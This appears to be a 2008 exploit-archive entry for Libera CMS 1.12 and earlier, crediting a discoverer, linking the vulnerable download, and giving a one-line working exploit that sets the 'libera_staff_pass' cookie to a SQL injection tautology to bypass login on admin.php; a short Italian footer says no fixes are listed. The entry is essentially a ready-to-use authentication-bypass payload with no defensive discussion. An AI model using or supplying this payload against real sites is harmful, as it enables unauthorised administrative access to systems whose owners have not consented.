Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit

2008-09-10 06:01:04

--==+============================================================================+==--
--==+ Libera CMS <= 1.12 Remote SQL Injection Exploit (Cookie) +==--
--==+============================================================================+==--

[*] Discovered By: StAkeR ~ [email protected]
[+] Discovered On: 10 Sep 2008
[+] Download: http://downloads.sourceforge.net/liberacms/Libera112.tar.gz?modtime=1209304487&big_mirror=0

[*] Page: admin.php / insert the code javascript and refresh

[*] Exploit: javascript: document.cookie = "libera_staff_pass=' or '1=1";

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.